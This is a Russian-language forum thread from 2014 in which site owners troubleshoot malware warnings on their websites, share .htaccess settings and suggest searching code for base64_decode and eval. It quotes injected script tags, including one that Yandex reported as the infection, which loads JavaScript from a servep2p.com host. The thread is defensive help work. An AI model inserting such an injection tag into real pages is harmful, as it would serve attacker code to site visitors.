На сайте зловредный код!

#16 12 января 2014 в 16:03
виталя, не то чтобы тырят, расскажу как у меня было,
Пользуюсь в основном оперой (стояла если не ошибаюсь 12 версия),
Делал какие то дороботки на сайте и часто с браузера смотрел исходный код, так вот тоже заметил кучу всего лишнего(система голая + инстант мапс)
Что да как оказалось и выяснилось
при редактировании обьекта в мапсе я нажал в редакторе на источник и вот что увидел
  1. <script type="text/javascript">(function(window){ window.price_context={ab:1, appId: 735177}; })(Function("return this")());</script>
  2. <script type="text/javascript" src="//dl.metabar.ru/static/js/ecomerce-context.js"></script>
сперва не понял что да как и почему — взял и снёс этот код
Потом создаю новый обьект и обратил внимание на то что страница долго прогружается(пинг с сайтом у меня 12мс)открываю источник и оп ля опять этот код
Пробывал с других браузеров всё было нормально, В итоге снёс все браузеры, и поставил их заново и проблема пропала.
#17 12 января 2014 в 17:50

kirkr, а если айпи динамический? вы об этом подумали?

ByFly
Каждому провайдеру выдается пул(диапозон) IP адресов, запостите через маску только вашего провайдера и все. В чем проблема?
#18 31 января 2014 в 14:42
Добрый день. На сайте тоже, что то завелось периодически Яндекс то добавляет приписку о заразе, то убирает. Сегодня пишет:
Результат выборочной проверки
Дата последней проверки 30.01.2014
Страница tenderoviki.ru/novosti-tenderov-i-goszakupok/federalnaja-kontraktnaja-sistema-chto-ozhidat-i-kogda.html
Вердикт Yandex/MalTds

В исходном коде страницы вроде ничего подозрительного не вижу. Помогите люди добрые, как с этим бороться…
#19 31 января 2014 в 17:13
При попытке зайти на Ваш сайт Яша выдает окно, что имеется информация, что эта веб-страница атакует компьютеры!
.htaccess смотрели? Нет изменений?
#20 31 января 2014 в 17:56
смотрел, все без изменений:
AddDefaultCharset utf-8
Options -Indexes

RewriteEngine On
RewriteBase /
RewriteRule ^.htaccess$ — [F]

RewriteCond %{REQUEST_URI} !\.(ico|css|js|txt)$ [NC]
RewriteCond %{REQUEST_FILENAME} !^/admin
RewriteCond %{REQUEST_FILENAME} !^/migrate
RewriteCond %{REQUEST_FILENAME} !^/install
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d

RewriteRule ^(.*)$ /index.php [L]
#21 31 января 2014 в 18:48
Может быть с этого начать. Из Help Яши
Проанализируйте информацию о заражении в Яндекс.Вебмастере, на вкладке Безопасность. Информация о заражении включает перечень зараженных страниц, даты проверок и вынесенные антивирусом вердикты. Перейдя по ссылке в названии вердикта, вы увидите его описание и примерный вид соответствующего вердикту кода (кода, который непосредственно появляется на страницах сайта). А затем сравнить выданные страницы с оригиналами из первоначального архива, если есть конечно. Ну может логи глянуть еще?
Если опять же ничего нет, то обязательно глянуть файлы шаблона и файлы конфигурации.
Поиск по фразам "base64_decode", "eval", "base64", ;document.write(
Прочитать на всякий случай это
  1. http://forum.webasyst.ru/viewtopic.php?pid=128045
И еще, если на сайте есть партнерские сети или реклама, то где то читал, что тоже могут быть подобные проблемы. Подробностей не знаю.
При проверке антивирусной базой Emsisoft выявляет вот это — Android.Adware.Kuguo.A (B).
По ходу это троян или вирус для мобильных устройств — утверждать не буду.
#22 31 января 2014 в 22:29
Пришел ответ от Яндекса:

В настоящий момент с Вашим сайтом все в порядке, он успешно прошёл перепроверку. Пометка в результатах поиска должна автоматически исчезнуть в течение нескольких часов.

Обнаруженный на сайте вредоносный код выглядел приблизительно следующим образом:

<script type="text/javascript" src="//domn1381207504.servep2p.com/jquery.js?1381207601"></script>

Источник заражения находился на серверной стороне.
#23 31 января 2014 в 22:31

Прочитать на всякий случай это
Код PHP:
forum.webasyst.ru/viewtopic.php?pid=128045

wer111

На самом деле это началось после перехода на новый сервер… scratch
Вы не можете отвечать в этой теме.
Войдите или зарегистрируйтесь, чтобы писать на форуме.
Используя этот сайт, вы соглашаетесь с тем, что мы используем файлы cookie.